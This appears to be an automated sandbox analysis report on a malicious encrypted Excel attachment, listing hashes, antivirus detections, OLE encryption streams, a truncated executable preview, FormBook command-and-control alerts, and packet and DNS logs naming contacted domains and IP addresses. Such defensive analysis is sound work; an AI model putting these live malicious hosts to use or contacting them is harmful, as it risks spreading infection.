                                                                                                                                                                      SSDEEP:12288:57n6WrZCWUV4Q3tJJ7eUMHaEKWAJuuXnvYH427ED7GcaSlUwSALuitlCFcozLgHj:576Wrox4QdbeUM8Wn+cEXHg
                                                                                                                                                                      MD5:396071CF13F858E6677A6655A2D173BB
                                                                                                                                                                      SHA1:5DBAD9D82FCF0D3BB83479AFEC8EA61441443263
                                                                                                                                                                      SHA-256:DD987F07D4E8F3D29758757AEA5FF5FEE6FCA9927D79E18F429B513E42491A09
                                                                                                                                                                      SHA-512:604EF9B2EDE3A60E48A760B77E41F561DF6BB8EC00E93E37EB475FB30BEB16C631D2ADAFF299C7110B7341F675D235462D68E91DD2D8BF595B3AE8CCEA04D74E
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 16%, Browse
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`3s`..............P.................. ........@.. ....................... ............@.................................4...W.......P............................................................................ ............... ..H............text........ ...................... ..`.rsrc...P...........................@..@.reloc..............................@..B................p.......H.......0...........9...................................................q.A.1.oe<.F.A.I....r..7Q...j.J.B_}.!...'!.P..[8. ...S.].......Z}Q..6..o.J.....>#....7..5M".W.......9^bC....."..c..@l@=..5W,..G..f..gm..LZ.x.r.../=..Q......Y$-...e_.va.7`.x...D.......F0.....*J.^...%.+R...I..i..o.i.j..:^...7.T#......Z..I./.;.<....5.g..\b.)Z.Bw...j.\*..8{p.[(./.......7..$.q..g..3|..n.T..(..j^.!...n..../.E..........+...(.5m.....v..x...ar...7..R.v>..a.B.E./s....4.jHl.....

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:CDFV2 Encrypted
                                                                                                                                                                      Entropy (8bit):7.9967964720409475
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                      File name:Processed APR12.xlsx
                                                                                                                                                                      File size:2693120
                                                                                                                                                                      MD5:c41fd90fc1e23885a1e075ce11d612e8
                                                                                                                                                                      SHA1:d1903963f15c001baceb7c0e92998bc38a19f318
                                                                                                                                                                      SHA256:9328d5dcf7664d4a92915ba032a183e63ef8602445737f42bf4d479b8037e1c2
                                                                                                                                                                      SHA512:5396b62923d362ad37c212f87ff8b0cbe9f45c6630a3c8bfbb1d625aab66852546ffa5437538e10b354aa5b858fd8a5a804b2bfeb431018e9864a3b6326f331d
                                                                                                                                                                      SSDEEP:49152:bUq/pJZx7mCy1a3/XUms8aop6WVlswMRkVo7szzYHdw6b+75eXu8:bU0HZxb6a39sOpmwioo7sYHdw6a7MXu8
                                                                                                                                                                      File Content Preview:........................>...................*...........................................................................................................z.......|.......~...............z.......|.......~...............z.......|.......~......................

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                                                                                                      Static OLE Info

                                                                                                                                                                      General

                                                                                                                                                                      Document Type:OLE
                                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                                      OLE File "Processed APR12.xlsx"

                                                                                                                                                                      Indicators

                                                                                                                                                                      Has Summary Info:False
                                                                                                                                                                      Application Name:unknown
                                                                                                                                                                      Encrypted Document:True
                                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                                      Contains Workbook/Book Stream:False
                                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                                      Flash Objects Count:
                                                                                                                                                                      Contains VBA Macros:False

                                                                                                                                                                      Streams

                                                                                                                                                                      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:64
                                                                                                                                                                      Entropy:2.73637206947
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                                                                                      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                                                                                      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:112
                                                                                                                                                                      Entropy:2.7597816111
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                                                                                      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                                                                                      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:200
                                                                                                                                                                      Entropy:3.13335930328
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                                                                                      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:\x6DataSpaces/Version
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:76
                                                                                                                                                                      Entropy:2.79079600998
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                                                                                      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                      Stream Path: EncryptedPackage, File Type: data, Stream Size: 2667608
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:EncryptedPackage
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:2667608
                                                                                                                                                                      Entropy:7.99992880466
                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                      Data ASCII:A . ( . . . . . K 7 1 . - . . % . 9 . . . . / . | . F . . ] A - M . k i D X m N . . . . u . . e . . | V V D . p . . I @ . q . " . . . . } . . 1 - . . A N . . M . . _ A . . [ [ - . . A N . . M . . _ A . . [ [ - . . A N . . M . . _ A . . [ [ - . . A N . . M . . _ A . . [ [ - . . A N . . M . . _ A . . [ [ - . . A N . . M . . _ A . . [ [ - . . A N . . M . . _ A . . [ [ - . . A N . . M . . _ A . . [ [ - . . A N . . M . . _ A . . [ [ - . . A N . . M . . _ A . . [ [ - . . A N . . M . . _ A . . [ [ - . . A N . . M
                                                                                                                                                                      Data Raw:41 b4 28 00 00 00 00 00 4b 37 31 cb 2d 1a e1 25 80 39 db 1c 7f 86 2f ef 7c 7f 46 0e 94 5d 41 2d 4d f2 6b 69 44 58 6d 4e ce e2 e5 df 75 be f7 65 ff 9f 7c 56 56 44 b4 70 0b ae 49 40 f7 71 d0 22 a9 9b d8 a7 7d c3 a6 31 2d b5 bf 41 4e bd e2 4d aa 89 5f 41 2e d1 5b 5b 2d b5 bf 41 4e bd e2 4d aa 89 5f 41 2e d1 5b 5b 2d b5 bf 41 4e bd e2 4d aa 89 5f 41 2e d1 5b 5b 2d b5 bf 41 4e bd e2 4d
                                                                                                                                                                      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                                                                                      General
                                                                                                                                                                      Stream Path:EncryptionInfo
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Stream Size:224
                                                                                                                                                                      Entropy:4.48806759716
                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . . ^ . . @ . . . G . x ( . t . | . . . . . . ^ e . ? Y . . . . . . 5 x . e . . . . . . . . . * . m c . n 1 . . . . d . . . . .
                                                                                                                                                                      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Snort IDS Alerts

                                                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                      04/12/21-14:46:19.490024TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22192.169.223.13
                                                                                                                                                                      04/12/21-14:46:19.490024TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22192.169.223.13
                                                                                                                                                                      04/12/21-14:46:19.490024TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916880192.168.2.22192.169.223.13
                                                                                                                                                                      04/12/21-14:46:25.804740TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22198.54.126.105
                                                                                                                                                                      04/12/21-14:46:25.804740TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22198.54.126.105
                                                                                                                                                                      04/12/21-14:46:25.804740TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22198.54.126.105

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Apr 12, 2021 14:45:20.787846088 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.830893993 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.831110001 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.831614971 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.875040054 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.875081062 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.875106096 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.875132084 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.875154018 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.875204086 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.875207901 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.875210047 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.916428089 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.916462898 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.916486025 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.916508913 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.916510105 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.916532040 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.916534901 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.916538000 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.916546106 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.916558981 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.916582108 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.916589022 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.916594028 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.916608095 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.916620970 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.916649103 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958028078 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958061934 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958081961 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958098888 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958108902 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958117008 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958127975 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958134890 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958152056 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958152056 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958168983 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958174944 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958188057 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958189964 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958203077 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958209038 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958224058 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958225012 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958241940 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958242893 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958259106 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958261013 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958276987 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958278894 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958295107 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958296061 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958312035 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:20.958313942 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958333969 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.958347082 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:20.960374117 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000521898 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000560999 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000577927 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000595093 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000600100 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000611067 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000624895 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000628948 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000633001 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000638962 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000652075 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000668049 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000670910 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000682116 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000685930 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000704050 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000719070 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000720978 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000726938 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000730038 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000742912 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000760078 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000763893 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000768900 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000776052 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000792027 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000801086 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000808954 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000808001 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000823975 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000829935 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000845909 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000848055 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000861883 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000865936 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000873089 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000884056 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000900030 CEST80491673.125.17.227192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:45:21.000901937 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000910997 CEST4916780192.168.2.223.125.17.227
                                                                                                                                                                      Apr 12, 2021 14:45:21.000916004 CEST80491673.125.17.227192.168.2.22

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Apr 12, 2021 14:46:19.220319033 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                      Apr 12, 2021 14:46:19.293416023 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:46:25.534754038 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                      Apr 12, 2021 14:46:25.608131886 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:46:31.012995958 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                      Apr 12, 2021 14:46:31.241882086 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:46:36.668503046 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                      Apr 12, 2021 14:46:36.770483971 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:46:41.769757032 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                      Apr 12, 2021 14:46:41.867244959 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:46:49.165788889 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                      Apr 12, 2021 14:46:49.423979044 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:46:54.871354103 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                      Apr 12, 2021 14:46:54.945375919 CEST53560098.8.8.8192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:47:00.040327072 CEST6186553192.168.2.228.8.8.8
                                                                                                                                                                      Apr 12, 2021 14:47:00.125185013 CEST53618658.8.8.8192.168.2.22
                                                                                                                                                                      Apr 12, 2021 14:47:05.231579065 CEST5517153192.168.2.228.8.8.8
                                                                                                                                                                      Apr 12, 2021 14:47:05.321095943 CEST53551718.8.8.8192.168.2.22

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                      Apr 12, 2021 14:46:19.220319033 CEST192.168.2.228.8.8.80x708cStandard query (0)www.centergolosinas.comA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:25.534754038 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.vectoroutlines.comA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:31.012995958 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.ruhexuangou.comA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:36.668503046 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.buylocalclub.infoA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:41.769757032 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.tricqr.comA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:49.165788889 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.dreamcashbuyers.comA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:54.871354103 CEST192.168.2.228.8.8.80xf09aStandard query (0)www.aideliveryrobot.comA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:47:00.040327072 CEST192.168.2.228.8.8.80x4b92Standard query (0)www.shopihy.comA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:47:05.231579065 CEST192.168.2.228.8.8.80x4b93Standard query (0)www.zgcbw.netA (IP address)IN (0x0001)

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                      Apr 12, 2021 14:46:19.293416023 CEST8.8.8.8192.168.2.220x708cNo error (0)www.centergolosinas.comcentergolosinas.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:19.293416023 CEST8.8.8.8192.168.2.220x708cNo error (0)centergolosinas.com192.169.223.13A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:25.608131886 CEST8.8.8.8192.168.2.220xa14dNo error (0)www.vectoroutlines.comvectoroutlines.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:25.608131886 CEST8.8.8.8192.168.2.220xa14dNo error (0)vectoroutlines.com198.54.126.105A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:31.241882086 CEST8.8.8.8192.168.2.220x2e78No error (0)www.ruhexuangou.com23.82.57.32A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:36.770483971 CEST8.8.8.8192.168.2.220x2f03Name error (3)www.buylocalclub.infononenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:41.867244959 CEST8.8.8.8192.168.2.220x3c4eName error (3)www.tricqr.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:49.423979044 CEST8.8.8.8192.168.2.220x6ec7No error (0)www.dreamcashbuyers.comsites.propelio.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:49.423979044 CEST8.8.8.8192.168.2.220x6ec7No error (0)sites.propelio.comsites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:49.423979044 CEST8.8.8.8192.168.2.220x6ec7No error (0)sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com18.236.1.157A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:49.423979044 CEST8.8.8.8192.168.2.220x6ec7No error (0)sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com34.215.222.250A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:49.423979044 CEST8.8.8.8192.168.2.220x6ec7No error (0)sites-external-prod-ebc852aa8146fe7f.elb.us-west-2.amazonaws.com54.69.66.227A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:46:54.945375919 CEST8.8.8.8192.168.2.220xf09aNo error (0)www.aideliveryrobot.com52.58.78.16A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:47:00.125185013 CEST8.8.8.8192.168.2.220x4b92No error (0)www.shopihy.comshopihy.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:47:00.125185013 CEST8.8.8.8192.168.2.220x4b92No error (0)shopihy.com160.153.137.40A (IP address)IN (0x0001)
                                                                                                                                                                      Apr 12, 2021 14:47:05.321095943 CEST8.8.8.8192.168.2.220x4b93Name error (3)www.zgcbw.netnonenoneA (IP address)IN (0x0001)

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • 3.125.17.227
                                                                                                                                                                      • www.centergolosinas.com
                                                                                                                                                                      • www.vectoroutlines.com
                                                                                                                                                                      • www.ruhexuangou.com
                                                                                                                                                                      • www.dreamcashbuyers.com
                                                                                                                                                                      • www.aideliveryrobot.com
                                                                                                                                                                      • www.shopihy.com

                                                                                                                                                                      HTTP Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.22491673.125.17.22780C:\Windows\explorer.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
